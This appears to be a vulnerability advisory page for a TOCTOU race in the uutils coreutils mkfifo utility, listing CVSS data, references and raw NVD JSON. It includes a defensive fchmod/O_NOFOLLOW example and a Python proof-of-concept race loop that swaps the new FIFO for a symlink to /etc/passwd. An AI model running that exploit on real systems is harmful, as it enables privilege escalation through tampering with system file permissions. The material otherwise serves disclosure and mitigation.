Security Vulnerability Report
CVE-2026-35352 CVSS 7.0 HIGH

Published: 2026-04-22 17:16:38
Last Modified: 2026-05-04 18:16:28

Description

A Time-of-Check to Time-of-Use (TOCTOU) race condition exists in the mkfifo utility of uutils coreutils. The utility creates a FIFO and then performs a path-based chmod to set permissions. A local attacker with write access to the parent directory can swap the newly created FIFO for a symbolic link between these two operations. This redirects the chmod call to an arbitrary file, potentially enabling privilege escalation if the utility is run with elevated privileges.
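An added example, not uutils code and not code from this report: one way to close the window described above is to pin the new FIFO with a file descriptor opened with O_NOFOLLOW, verify it, and set the mode with fchmod on that descriptor instead of a path-based chmod. Python is used because its os module exposes the same system calls; the function names, file names and temporary directory are assumptions made for the illustration.

```python
import errno
import os
import stat
import tempfile

def set_mode_nofollow(dir_fd, name, mode):
    """Pin the object with an fd, verify it, then fchmod the fd (not the path)."""
    # O_NOFOLLOW: ELOOP on Linux if name is now a symlink. O_NONBLOCK: a
    # read-only open of a FIFO returns at once even with no writer.
    fd = os.open(name, os.O_RDONLY | os.O_NONBLOCK | os.O_NOFOLLOW, dir_fd=dir_fd)
    try:
        st = os.fstat(fd)
        if not stat.S_ISFIFO(st.st_mode) or st.st_uid != os.geteuid():
            raise OSError(errno.EPERM, "not the FIFO this process created", name)
        os.fchmod(fd, mode)
    finally:
        os.close(fd)

def make_fifo(parent, name, mode):
    dir_fd = os.open(parent, os.O_RDONLY | os.O_DIRECTORY)
    try:
        os.mkfifo(name, 0o600, dir_fd=dir_fd)  # restrictive until verified
        set_mode_nofollow(dir_fd, name, mode)
    finally:
        os.close(dir_fd)

def demo():
    """Constructed scenario in a private temp dir; returns what was observed."""
    with tempfile.TemporaryDirectory() as d:
        make_fifo(d, "ok_fifo", 0o640)
        fifo_mode = stat.S_IMODE(os.lstat(os.path.join(d, "ok_fifo")).st_mode)
        victim = os.path.join(d, "victim")  # stand-in for a sensitive file
        open(victim, "w").close()
        os.chmod(victim, 0o600)
        os.symlink(victim, os.path.join(d, "swapped"))  # name after a swap
        dir_fd = os.open(d, os.O_RDONLY | os.O_DIRECTORY)
        try:
            set_mode_nofollow(dir_fd, "swapped", 0o666)
            refused = False
        except OSError as e:
            refused = e.errno == errno.ELOOP
        finally:
            os.close(dir_fd)
        after_safe = stat.S_IMODE(os.stat(victim).st_mode)
        os.chmod(os.path.join(d, "swapped"), 0o666)  # path-based: follows link
        after_path = stat.S_IMODE(os.stat(victim).st_mode)
        return fifo_mode, refused, after_safe, after_path

if __name__ == "__main__":
    print(demo())
```

The descriptor-based call refuses the symlink and leaves the stand-in file at 0600, while the path-based chmod on the same name changes the stand-in file's mode.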

CVSS Details

CVSS Score: 7.0
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:uutils:coreutils:-:*:*:*:*:rust:*:* - VULNERABLE
uutils coreutils (versions prior to the fix)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
PoC for CVE-2026-35352: TOCTOU Race Condition in uutils coreutils mkfifo
This script attempts to exploit the race condition between mkfifo creation and chmod.
"""
import os
import time
import sys

# Configuration
FIFO_NAME = "vuln_fifo"
TARGET_FILE = "/etc/passwd"  # Target file to modify permissions
WORK_DIR = "/tmp/cve_2026_35352_poc"


def setup():
    """Create the working directory"""
    if not os.path.exists(WORK_DIR):
        os.makedirs(WORK_DIR)
    os.chdir(WORK_DIR)
    print(f"[*] Working in {WORK_DIR}")


def exploit():
    """
    Simulates the race condition.
    Note: In a real scenario, this must be run concurrently with the vulnerable mkfifo process.
    The goal is to swap the FIFO with a symlink before chmod is called.
    """
    print("[*] Starting race condition loop...")
    print("[*] Waiting for the vulnerable process (mkfifo) to create the FIFO...")
    attempts = 0
    while attempts < 10000:
        try:
            # Check if FIFO exists and is not a symlink (the window of opportunity)
            if os.path.exists(FIFO_NAME) and not os.path.islink(FIFO_NAME):
                # Attempt to swap the file with a symlink to a privileged file
                os.remove(FIFO_NAME)
                os.symlink(TARGET_FILE, FIFO_NAME)
                print(f"[+] Attempt {attempts}: Swapped {FIFO_NAME} with symlink to {TARGET_FILE}")
                # Verify if the exploit was successful (check if target is writable)
                # This assumes the chmod 777 (or similar) happened on the target
                if os.access(TARGET_FILE, os.W_OK):
                    print(f"[+] SUCCESS! {TARGET_FILE} is now writable.")
                    return True
            # If it's already a symlink, reset it to allow the race to continue (simulation)
            elif os.path.islink(FIFO_NAME):
                os.remove(FIFO_NAME)
        except FileNotFoundError:
            pass
        except Exception as e:
            print(f"[-] Error: {e}")
        attempts += 1
        time.sleep(0.0001)  # Short sleep to reduce CPU usage
    print("[-] Failed to win race condition within the limit.")
    return False


if __name__ == "__main__":
    if os.geteuid() != 0:
        print("[!] Warning: This exploit usually requires the victim process to run as root.")
    setup()
    exploit()

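References

https://github.com/uutils/coreutils/issues/10020
http://www.openwall.com/lists/oss-security/2026/05/04/4
http://www.openwall.com/lists/oss-security/2026/05/04/5
http://www.openwall.com/lists/oss-security/2026/05/04/6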

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-35352", "sourceIdentifier": "[email protected]", "published": "2026-04-22T17:16:37.597", "lastModified": "2026-05-04T18:16:28.370", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Time-of-Check to Time-of-Use (TOCTOU) race condition exists in the mkfifo utility of uutils coreutils. The utility creates a FIFO and then performs a path-based chmod to set permissions. A local attacker with write access to the parent directory can swap the newly created FIFO for a symbolic link between these two operations. This redirects the chmod call to an arbitrary file, potentially enabling privilege escalation if the utility is run with elevated privileges."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.0, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.0, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-367"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:uutils:coreutils:-:*:*:*:*:rust:*:*", "matchCriteriaId": "4A9AF9E4-E17C-48AD-8051-B49998618839"}]}]}], "references": [{"url": "https://github.com/uutils/coreutils/issues/10020", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/05/04/4", "source": "af854a3a-2127-422b-91ae-364da2661108"}, {"url": "http://www.openwall.com/lists/oss-security/2026/05/04/5", "source": "af854a3a-2127-422b-91ae-364da2661108"}, {"url": 
"http://www.openwall.com/lists/oss-security/2026/05/04/6", "source": "af854a3a-2127-422b-91ae-364da2661108"}, {"url": "https://github.com/uutils/coreutils/issues/10020", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking", "Vendor Advisory"]}]}}